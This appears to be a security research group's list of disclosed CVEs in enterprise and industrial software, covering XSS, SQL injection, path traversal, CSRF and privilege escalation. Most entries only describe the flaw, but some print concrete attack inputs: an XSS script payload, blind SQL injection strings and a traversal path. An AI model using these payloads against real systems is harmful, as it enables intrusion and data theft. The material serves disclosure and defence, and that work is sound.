In ENM releases before 21.2 users belonging to the same AMOS authorization group can retrieve the data from certain log files. All AMOS users are considered to be highly privileged users in ENM system and all must be previously defined and authorized by the Security Administrator. Those users can access some log’s files, under a common path, and read information stored in the log’s files in order to conduct privilege escalation.
The vulnerability details can be shared from vendor to customers upon request.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (‘Reflected Cross-site Scripting’). – CWE-79
Software Version: <=18B
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-32569
CVSv3: 6.1
Severity: Medium
Credits: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli
In OSS-RC systems of the release 18B and older customer documentation browsing libraries under ALEX are subject to Cross-Site Scripting. This problem is completely resolved in new Ericsson library browsing tool ELEX used in systems like Ericsson Network Manager.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Ericsson Network Manager is a new generation OSS system which OSS-RC customers shall upgrade to.
Vulnerability Description: CWE-732: Incorrect Permission Assignment for Critical Resource
Software Version: < 4.8.5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-31540
CVSv3: 7.1
Severity: High
Credits: Francesco Giordano, Massimiliano Brolli
Wowza Streaming Engine through 4.8.5 (in a default installation) has incorrect file permissions of configuration files in the conf/ directory. A regular local user is able to read and write to all the configuration files, e.g., modify the application server configuration.
Figure 1: File permissions
Vulnerability Description: CWE-312: Cleartext Storage of Sensitive Information
Software Version: < 4.8.5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-31539
CVSv3: 5.5
Severity: Medium
Credits: Francesco Giordano, Massimiliano Brolli
Wowza Streaming Engine through 4.8.5 (in a default installation) has cleartext passwords stored in the conf/admin.password file. A regular local user is able to read usernames and passwords.
Figure 1: File permissions
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting) - CWE-79
Software Version: Softing AG OPC Toolbox v4.10.1.13035
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-29661
CVSv3: 5.4
Severity: Medium
Credits: Gianni Palombizio, Michele Cisternino, Stefano Scipioni, Massimiliano Brolli
Softing AG OPC Toolbox version 4.10.1.13035 allows /en/diag_values.html Stored XSS on ITEMLISTVALUES##ITEMID parameter. A malicious user leveraging this vulnerability could inject arbitrary JavaScript into the trace file. The malicious payload will then be triggered every time an authenticated user browses the page containing it.
After logging in to the application with a valid user, the full request is shown on the left
Figure 1: Full HTTP request
The malicious payload is: “><script>alert(‘XSS’)</script>
The JavaScript code is executed when the victim user navigates the tab “Diagnostic/Trace”fff
Figure 2: XSS on response page
Vulnerability Description: Cross-Site Request Forgery (CSRF) - CWE-352
Software Version: Softing AG OPC Toolbox v4.10.1.13035
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-29660
CVSv3: 8.8
Severity: High
Credits: Gianni Palombizio, Michele Cisternino, Stefano Scipioni, Massimiliano Brolli
A Cross-Site Request Forgery (CSRF) vulnerability in Softing AG OPC Toolbox version 4.10.1.13035 and earlier allows attackers to reset the administrative password by inducing the Administrator user to browse a URL controlled by an attacker.
Create and serve a web page containing the following HTML code shown on the left.
Figure 1: HTML code for CSRF victim
The authenticated administrator browses the page configured by the attacker. The password reset request is made to the web application, using the admin's browsing session.
Figure 2: The page is served on the attacker system and requested by the victim
The password of the "Administrator" user is reset successfully
Figure 3: CSRF password reset request executed successfully
Vulnerability Description: CWE-312: Cleartext Storage of Sensitive Information
Software Version: <= 8.12.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28979
CVSv3: 6.5
Severity: Medium
Credits: Luca Di Giuseppe, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli
SafeNet KeySecure Management Console 8.12.0 is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked.
Vulnerability Description: Exposure of Resource to Wrong Sphere – CWE-668
Software Version: < 21.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28488
CVSv3: 6.5
Severity: Medium
Credits: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli
In ENM releases before 21.2 users belonging to the same AMOS authorization group can retrieve the data related to managed network from each other. All AMOS users are considered to be highly privileged users in ENM system and all users must be previously defined and authorized by the Security Administrator. The vulnerability details can be shared from vendor to customers upon request.
Vulnerability Description: Relative Path Traversal (CWE-23)
Software Version: MSC-S IS 3.1 before IS 3.1 CP22
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28485
CVSv3: 4.3
Severity: Medium
Credits: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli
In Ericsson Mobile Switching Center Server (MSC-S) before IS 3.1 CP22, the SIS web application allows relative path traversal via a specific parameter in the https request after authentication, which allows access to files on the system that are not intended to be accessible via the web application. There is low impact to confidentiality because the affected files are limited to what the OTP webserver can access.
Vulnerability Description: Privilege Escalation via SUID/GUID file - CWE-250
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28250
CVSv3: 7.8
Severity: High
Credits: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli
CA eHealth Performance Manager through 6.3.2.12 is affected by Privilege Escalation via a setuid (and/or setgid) file. When a component is run as an argument of the runpicEhealth executable, the script code will be executed as the ehealth user.
Vulnerability Description: Privilege Escalation via Dynamically Linked Shared Object Library - CWE-426
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28249
CVSv3: 8.8
Severity: High
Credits: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli
CA eHealth Performance Manager through 6.3.2.12 is affected by Privilege Escalation via a Dynamically Linked Shared Object Library. To exploit the vulnerability, the ehealth user must create a malicious library in the writable RPATH, to be dynamically linked when the FtpCollector executable is run. The code in the library will be executed as the root user.
Vulnerability Description: Improper Restriction of Excessive Authentication Attempts - CWE-307
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28248
CVSv3: 7.5
Severity: High
Credits: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli
CA eHealth Performance Manager through 6.3.2.12 is affected by Improper Restriction of Excessive Authentication Attempts. An attacker is able to perform an arbitrary number of /web/frames/ authentication attempts using different passwords, and eventually gain access to a targeted account.
Vulnerability Description: Multiple Reflected Cross-site Scripting - CWE-79
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28247
CVSv3: 5.4
Severity: Medium
Credits: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli
CA eHealth Performance Manager through 6.3.2.12 is affected by Cross Site Scripting (XSS). The impact is: An authenticated remote user is able to inject arbitrary web script or HTML due to incorrect sanitization of user-supplied data and perform a Reflected Cross-Site Scripting attack against the platform users. The affected endpoints are: cgi/nhWeb with the parameter report, aviewbin/filtermibobjects.pl with the parameter namefilter, and aviewbin/query.pl with the parameters System, SystemText, Group, and GroupText.
Vulnerability Description: Privilege Escalation via Dynamically Linked Shared Object Library - CWE-426
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28246
CVSv3: 7.8
Severity: High
Credits: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli
CA eHealth Performance Manager through 6.3.2.12 is affected by Privilege Escalation via a Dynamically Linked Shared Object Library. A regular user must create a malicious library in the writable RPATH, to be dynamically linked when the emtgtctl2 executable is run. The code in the library will be executed as the ehealth user.
Vulnerability Description: Unrestricted Upload of File with Dangerous Type - CWE-434
Software Version: NOKIA NetAct 18A
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-26597
CVSv3: 6.5
Severity: Medium
Credits: Raffaella Robles, Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in Nokia NetAct 18A. A remote user, authenticated to the NOKIA NetAct Web Page, can visit the Site Configuration Tool web site section and arbitrarily upload potentially dangerous files without restrictions via the /netact/sct dir parameter in conjunction with the operation=upload value.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting) - CWE-79
Software Version: NOKIA NetAct 18A
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-26596
CVSv3: 5.4
Severity: Medium
Credits: Raffaella Robles, Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in Nokia NetAct 18A. A malicious user can change a filename of an uploaded file to include JavaScript code, which is then stored and executed by a victim's web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. Here, the /netact/sct filename parameter is used.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting) - CWE-79
Software Version: <= 3.1.2.18
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-3314
CVSv3: 6.1
Severity: Medium
Credits: Francesco Giordano, Massimiliano Brolli
** UNSUPPORTED WHEN ASSIGNED ** Oracle GlassFish Server 3.1.2.18 and below allows /common/logViewer/logViewer.jsf XSS. A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
Vulnerability Description: URL Redirection to Untrusted Site ('Open Redirect')
Software Version: Oracle Business Intelligence Enterprise Edition of Oracle Fusion Middleware. The affected versions are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-2005
Oracle Credits CPU 2021: https://www.oracle.com/security-alerts/cpujan2021.html
CVSv3: 4.7
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Francesco Russo, Edoardo Predieri, Fabio Minarelli, Massimiliano Brolli
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions) allows unauthenticated attacker to construct a URL within the application that causes a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application.
Vulnerability Description: Improper Restriction of Excessive Authentication Attempts (Rate Limit Bypass on login page)
Software Version: WordPress Plugin Limit Login Attempts Reloaded versions 2.13.0 – 2.17.3.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-35590
CVSv3: 9.8
Severity: Critical
Credits: Veno Eivazian
LimitLoginAttempts.php in the limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows a bypass of (per IP address) rate limits because the X-Forwarded-For header can be forged. When the plugin is configured to accept an arbitrary header for the client source IP address, a malicious user is not limited to perform a brute force attack, because the client IP header accepts any arbitrary string. When randomizing the header input, the login count does not ever reach the maximum allowed retries.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Reflected Cross-Site Scripting) - CWE-79
Software Version: WordPress Plugin Limit Login Attempts Reloaded versions 2.13.0 – 2.17.3.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-35589
CVSv3: 5.4
Severity: Medium
Credits: Veno Eivazian
The limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows wp-admin/options-general.php?page=limit-login-attempts&tab= XSS. A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims.
Vulnerability Description: Windows Unquoted Search Path
Software Version: Schneider Electric StruxureWare Building Operation Enterprise Server Installer versions 1.0 – 3.1 and Enterprise Central Installer versions 2.0 – 3.1.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-28209
CVSv3: 7.0
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
Any local Windows user who has write permission on at least one of the subfolders of the Connect Agent service binary path, being able to gain the privilege of the user who started the service. By default, the Enterprise Server and Enterprise Central is always installed at a location requiring Administrator privileges so the vulnerability is only valid if the application has been installed on a non-secure location.
Vulnerability Description: CWE-502: Deserialization of Untrusted Data
Software Version: IBM InfoSphere Information Server 8.5.0.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-27583
CVSv3: 9.8
Severity: Critical
Credits: Damiano Proietti, Davide De Rubeis, Matteo Brutti, Alessandro Sabetta, Massimiliano Brolli
IBM InfoSphere Information Server 8.5.0.0 is affected by deserialization of untrusted data which could allow remote unauthenticated attackers to execute arbitrary code.
Vulnerability Description: Stored Xss
Software Version: 3.1.12.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-17458
CVSv3: 5.4
Severity: Medium
Credits: Francesco Giordano, Sebastiano Lanzarotto, Francesco Pigini, Massimiliano Brolli
Multiple XSS were found in MultiUX, almost every parameter in the mailbox creation page is vulnerable to stored XSS.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Reflected Cross-Site Scripting) - CWE-79
Software Version: Fujitsu ServerView Suite iRMC v8.08F
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-17457
CVSv3: 5.4
Severity: Medium
Credits: Damiano Proietti, Stefano Scipioni, Massimiliano Brolli
Fujitsu ServerView Suite iRMC before 9.62F allows ‘/54?ms=9&lang=0&sid=’ XSS on PSCU_FILE_INIT parameter. A malicious user can insert a malicious payload in the XML configuration file. After selecting ‘Save Configuration’, the payload is triggered in the error response page, which is then reflected to the user and executed by the web browser.
The full request is the following:
Figure 1: The full HTTP request
The JavaScript code is executed when the error message is displayed:
Figure 2: XSS on error message
Vulnerability Description: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Software Version: All versions
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-15794
CVSv3: 4.3
Severity: Medium
Credits: Davide De Rubeis, Damiano Proietti, Matteo Brutti, Stefano Scipioni, Massimiliano Brolli
Some error messages in the web application show the absolute path to the requested resource. This could allow an authenticated attacker to retrieve additional information about the host system.
The following URL is enough to trigger the vulnerability:
Figure 1: if the requested file doesn't exist, the application returns the full path it searched in
Vulnerability Description: CWE-1021: Improper Restriction of Rendered UI Layers or Frames
Software Version: All versions
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-15793
CVSv3: 4.5
Severity: Medium
Credits: Davide De Rubeis, Damiano Proietti, Matteo Brutti, Stefano Scipioni, Massimiliano Brolli
The device does not properly set the X-Frame-Options HTTP Header which makes it vulnerable to Clickjacking attacks. This could allow an unauthenticated attacker to retrieve or modify data in the context of a legitimate user by tricking that user to click on a website controlled by the attacker.
Vulnerability Description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
Software Version: All versions
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-15792
CVSv3: 4.3
Severity: Medium
Credits: Davide De Rubeis, Damiano Proietti, Matteo Brutti, Stefano Scipioni, Massimiliano Brolli
The web service does not properly apply input validation for the ID query parameter in a reserved area on the following URL
This could allow an authenticated attacker to retrieve data via a content-based blind SQL injection attack, using for example the following payloads:
Figure 1: true condition returns the object 465587
For a “true” response:
id=465587%20and%20%20%27asd%27=%27asd%27%20—
Figure 2: false condition returns an error on the index
For a “false” response:
id=465587%20and%20%20%27asd%27=%27xxx%27%20—
Vulnerability Description: Unrestricted Upload of File with Dangerous Type
Software Version: Oracle Business Intelligence Enterprise Edition of Oracle Fusion Middleware. The affected versions are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-14843
Oracle Credits CPU 2020: https://www.oracle.com/security-alerts/cpuoct2020.html
CVSv3: 7.1
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Francesco Russo, Edoardo Predieri, Fabio Minarelli, Massimiliano Brolli
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions) allows authenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as, malware spreading, unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data.
Vulnerability Description:
Software Version: Oracle Business Intelligence Enterprise Edition of Oracle Fusion Middleware. The affected versions are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-14842
Oracle Credits CPU 2020: https://www.oracle.com/security-alerts/cpuoct2020.html
CVSv3: 8.2
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Francesco Russo, Edoardo Predieri, Fabio Minarelli, Massimiliano Brolli
Multiple vulnerabilities in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions) allows authenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as, malware spreading, unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data
Vulnerability Description:
Software Version: Oracle Business Intelligence Enterprise Edition of Oracle Fusion Middleware. The affected versions are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-14690
CVSv3: 8.2
Severity: High
Credits: Alessandro Bosco, Edoardo Predieri, Fabio Minarelli, Francesco Russo, Luca Di Giuseppe, Massimiliano Brolli
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions) allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data.
Vulnerability Description:
Improper Limitation of a Pathname to a Restricted Directory ('Full Path Traversal') - CWE-22
Software Version: FlexNet Publisher 11.12.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-12081
CVSv3: 7.5
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
Step-by-step instructions and PoC
A remote user, authenticated to FlexNet Publisher License Administrator, is able to define an arbitrary full path name where to save the application logs. By using the functionality of "view logs" the attacker can access the content of the previous specified file.
Affected Endpoints:
Below are the evidences with the vulnerability details and the payloads used.
The HTTP request used by the attacker to change the full path name of the logs to win.ini (click here to enlarge the image)
Using the function of "view logs" the malicious user can access to the previously specified file (click here to enlarge the image)
Security Impact
By exploiting this issue an attacker is able to read arbitrary file from file system of the target server.
Vulnerability Description: CWE-22: Full Path Traversal
Software Version: Johnson Controls Metasys MREWeb Service 9.0.0.4256
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-9050
CVSv3: 7.5
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Stefano Scipioni, Massimiliano Brolli
A remote non-authenticated attacker can define an arbitrary full path name while using the web resource /MREService/Download.aspx. By using this functionality, an attacker can download arbitrary files from the system.
Vulnerability Description: Improper Access Control
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.9 – 3.1.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-7573
CVSv3: 6.5
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
A remote non-authenticated attacker is able to access a restricted web resource due to improper access control.
Vulnerability Description: Improper Restriction of XML External Entity Reference
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.9 – 3.1.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-7572
CVSv3: 8.8
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
A remote user, authenticated to Building Operation WebReports, is able to inject arbitrary XML code containing a reference to an external entity via a crafted HTTP request into the server-side XML parser without being sanitized. By exploiting this vulnerability, an attacker can access the contents of a file on the system potentially containing sensitive data, other restricted web resources via server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts like a denial of service.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting Reflected)
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.9 – 3.1.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-7571
CVSv3: 5.4
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
Multiple Improper Neutralization of Input During Web Page Generation (Cross-site Scripting Reflected) vulnerability exists that could cause a remote attacker to inject arbitrary web script or HTML due to incorrect sanitization of user supplied data and achieve a Cross-Site Scripting reflected attack against other WebReport users.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting Stored)
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.9 – 3.1.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-7570
CVSv3: 5.4
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
Improper Neutralization of Input During Web Page Generation (Cross-site Scripting Stored) vulnerability exists that could cause an authenticated remote user being able to inject arbitrary web script or HTML due to incorrect sanitization of user-supplied data and achieve a Cross-Site Scripting stored attack against other WebReport users.
Vulnerability Description: Unrestricted Upload of File with Dangerous Type
Software Version: VAM: Schneider Electric StruxureWare Building Operation WebReports versions 1.0 – 3.1.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-7569
CVSv3: 8.8
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
Unrestricted Upload of File with Dangerous Type vulnerability exists that could cause an authenticated remote user being able to upload arbitrary files due to incorrect verification of user supplied files and achieve remote code execution.
Vulnerability Description: Information Disclosure
Software Version: QES 2.0.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-2505
CVSv3: 2.3
Severity: Low
Credits: Francesco Giordano, Francesco Pigini, Sebastiano Lanzarotto, Massimiliano Brolli
In QNAP QES 2.0.0 there is a vulnerability that allows an attacker to exploit a type confusion to find information on the platform.
Vulnerability Description: Arbitrary File Download
Software Version: QES 2.0.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-2504
CVSv3: 7.5
Severity: High
Credits: Francesco Giordano, Francesco Pigini, Sebastiano Lanzarotto, Massimiliano Brolli
A vulnerability was found in QNAP QES 2.0 that allows authenticated attacker to escape the webroot and download file of the NAS. The vulnerability resides in the download functionality.
Vulnerability Description: Stored XSS via Arbitrary File upload
Software Version: QES 2.0.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-2503
CVSv3: 5.4
Severity: Medium
Credits: Francesco Giordano, Francesco Pigini, Sebastiano Lanzarotto, Massimiliano Brolli
A vulnerability was found in QNAP QES 2.0 that If exploited, vulnerability could allow remote attackers to inject malicious code in File Station. The vulnerability resides in the upload functionality that doesn’t perform the correct sanitization.
Vulnerability Description: OS Command Injection Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19994
CVSv3: 9.8
Severity: Critical
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
An attacker without authentication is able to execute arbitrary operating system command by injecting a HTTP/POST parameter on the PHP Web page.
Vulnerability Description: Multiple Full Path Disclosure Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19993
CVSv3: 5.3
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
This server is configured to display PHP error messages. One or more fully qualified path names were found on this page. From this information the attacker may learn the file system structure from the web server. This information can be used to conduct further attacks.
Vulnerability Description: Arbitrary file read Post-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19992
CVSv3: 6.5
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
A user with valid credentials is able to read XML files on the filesystem via the web interface. The PHP page doesn’t check the parameter that identify the file name to be read. Thus, an attacker can manipulate the file name to access any sensitive file within the filesystem.
Vulnerability Description: Multiple XSS reflected Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19991
CVSv3: 5.4
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
Cross-site scripting Reflected (XSS) vulnerability allows authenticated remote attackers to inject arbitrary web script or HTML into almost any HTTP/GET-POST parameter which reflect the user input without sanitization.
Vulnerability Description: Multiple XSS Stored Post-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19990
CVSv3: 5.4
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
Cross-site scripting Stored (XSS) vulnerability allows authenticated remote attackers to inject arbitrary web script or HTML into some HTTP/GET-POST parameter which reflect the user input stored on the system.
Vulnerability Description: Multiple Broken Access Control Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19989
CVSv3: 7.5
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
Access control (authorization) determines which users can interact with systems and resources within the Web interface. When access control is broken, users could send unauthorized requests to the application. Unauthorized access to system functionality and resources creates an exploitable weakness that opens your company to harmful and potentially expensive outcomes.
Vulnerability Description: Arbitrary file write Post-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19988
CVSv3: 8.8
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
A user with valid credentials is able to create and write XML files on the filesystem via the web interface. The PHP page doesn’t check the parameter that identify the file name to be created. Thus, an attacker can manipulate the file name to create any type of file within the filesystem.
Vulnerability Description: Multiple Cross-Site request forgery pre authentication
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19987
CVSv3: 6.5
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which he is currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. This vulnerability has been found in several page. An attacker can exploit it in functionalities such as change password, add user, add privileges and so on.
Vulnerability Description: SQL Injection Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19986
CVSv3: 7.5
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
An attacker without authentication is able to execute arbitrary SQL statements by injecting the HTTP/POST-GET parameter in the PHP Web page.
Vulnerability Description: Pre-Auth Cross Site Scripting
Software Version: Wowza Streaming Engine < 4.x.x
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19456
CVSv3: 6.1
Severity: Medium
Credits: Francesco Giordano, Massimiliano Brolli
A Reflected XSS was found in the server selection box inside the login page at:
http://[host]/enginemanager/loginfailed.html
Vulnerability Description: Local Privilege Escalation
Software Version: < 4.8.5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19455
CVSv3: 7.8
Severity: High
Credits: Francesco Giordano, Massimiliano Brolli
A local privilege escalation was found in the Linux Version of the server. A user can write arbitrary command in every file in /usr/local/WowzaStreamingEngine/manager/bin/ since they are writable by anyone and executed at boot or stop of the server as root.
Vulnerability Description: Arbitrary File Download
Software Version: Wowza Streaming Engine < 4.x.x
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19454
CVSv3: 7.5
Severity: High
Credits: Francesco Giordano, Massimiliano Brolli
An arbitrary file download was found in the "Download Log" functionality at
https://[host]/enginemanager/server/logs/download
Vulnerability Description: Stored XSS
Software Version: < 4.8.5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19453
CVSv3: 6.1
Severity: Medium
Credits: Francesco Giordano, Massimiliano Brolli
An authenticated user, with access to the proxy license editing is able insert a malicious payload that will be triggered in the main page of server settings.
Vulnerability Description: Path Traversal
Software Version: NOKIA IMPACT < 18A
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-17406
CVSv3: 5.3
Severity: Medium
Credits: Francesco Giordano, Alessandro Sabetta, Massimiliano Brolli
An authenticated user with access to the CDP component of NOKIA IMPACT is able to save file in arbitrary positions on the filesystem. This vulnerability was found in a feature of the system that allows to load multiple devices by uploading a properly formatted CSV file.
The filename parameter is vulnerable to a path traversal vulnerability, indeed naming the file as a relative path an attacker is able to save it in an arbitrary position on the filesystem (e.g. ../../../../../../../tmp/myfile.csv)
Vulnerability Description: Cross Site Scripting
Software Version: NOKIA IMPACT < 18A
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-17405
CVSv3: 6.1
Severity: Medium
Credits: Francesco Giordano, Alessandro Sabetta, Massimiliano Brolli
